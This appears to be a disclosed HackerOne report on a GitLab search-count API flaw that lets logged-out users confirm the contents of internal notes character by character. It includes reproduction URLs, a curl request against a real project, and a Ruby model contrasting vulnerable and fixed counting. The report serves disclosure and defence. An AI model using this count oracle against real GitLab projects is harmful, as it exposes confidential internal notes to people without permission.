Gitlab search allows leaking internal notes
HackerOne report #1829768 by shells3c
on 2023-01-10, assigned to @ameyadarshan:
Report
Summary
The Gitlab search count API returns the count of results obtained from internal notes, even though the requesting user has no permission to view those notes. This results in internal notes being guessable/brute-forceable.
Steps to reproduce
- Create a public project, then a public issue, and add an internal note with the message: Internal comment
- Log out and run the following searches (each URL is followed by its response):
  https://gitlab.com/search/count?project_id=<ID>&scope=notes&search="Internal c"
  {"count":"1"}
  https://gitlab.com/search/count?project_id=<ID>&scope=notes&search="Internal cc"
  {"count":"0"}
  https://gitlab.com/search/count?project_id=<ID>&scope=notes&search="Internal co"
  {"count":"1"}
  https://gitlab.com/search/count?project_id=<ID>&scope=notes&search="Internal comment"
  {"count":"1"}
Examples
I have created an example project for testing:
curl 'https://gitlab.com/search/count?project_id=25681831&scope=notes&search=%22CVE-2021-1234%22'
{"count":"1"}
You can confirm that the note CVE-2021-1234 exists, even though you can't see it in the Gitlab search results: https://gitlab.com/search?project_id=25681831&scope=notes&search=%22CVE-2021-1234%22
Impact
Leaking internal notes of public issues
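The count oracle described in the report, modelled as an added example (this is not GitLab's code): an in-memory note store where the vulnerable counter matches the search term against every note and only hides internal notes when rendering, while the fixed counter applies the viewer's permission filter before counting. The `Note`, `Viewer`, `NOTES` and the three functions are all constructed for this illustration; the differential check `leaks?` is the kind of test a defender can run against a search endpoint to confirm counts never exceed what the viewer can list.

```ruby
# Added example, not GitLab's code. Models why a count endpoint that filters
# by permission only at render time leaks whether an internal note matches
# a guessed prefix, and the fix: filter by visibility before counting.

Note = Struct.new(:id, :body, :internal, keyword_init: true)
Viewer = Struct.new(:project_member, keyword_init: true)

# Constructed sample data: one ordinary note and one internal note on a
# public issue, mirroring the report's "Internal comment" note.
NOTES = [
  Note.new(id: 1, body: "Looks good to me", internal: false),
  Note.new(id: 2, body: "Internal comment", internal: true),
].freeze

ANONYMOUS = Viewer.new(project_member: false)
MEMBER = Viewer.new(project_member: true)

# Internal notes are readable only by project members.
def visible?(note, viewer)
  !note.internal || viewer.project_member
end

def matches?(note, term)
  note.body.downcase.include?(term.downcase)
end

# Vulnerable: counts matches over every note, ignoring who is asking.
# The result list is filtered later, but the count already leaked.
def vulnerable_count(term, viewer)
  NOTES.count { |n| matches?(n, term) }
end

# Fixed: narrow to notes the viewer may read, then apply the search term.
def fixed_count(term, viewer)
  NOTES.select { |n| visible?(n, viewer) }.count { |n| matches?(n, term) }
end

# Differential check: a count endpoint leaks if it ever reports more hits
# than the same viewer could actually list for the same term.
def leaks?(term, viewer, counter)
  listed = NOTES.select { |n| visible?(n, viewer) && matches?(n, term) }.size
  counter.call(term, viewer) > listed
end
```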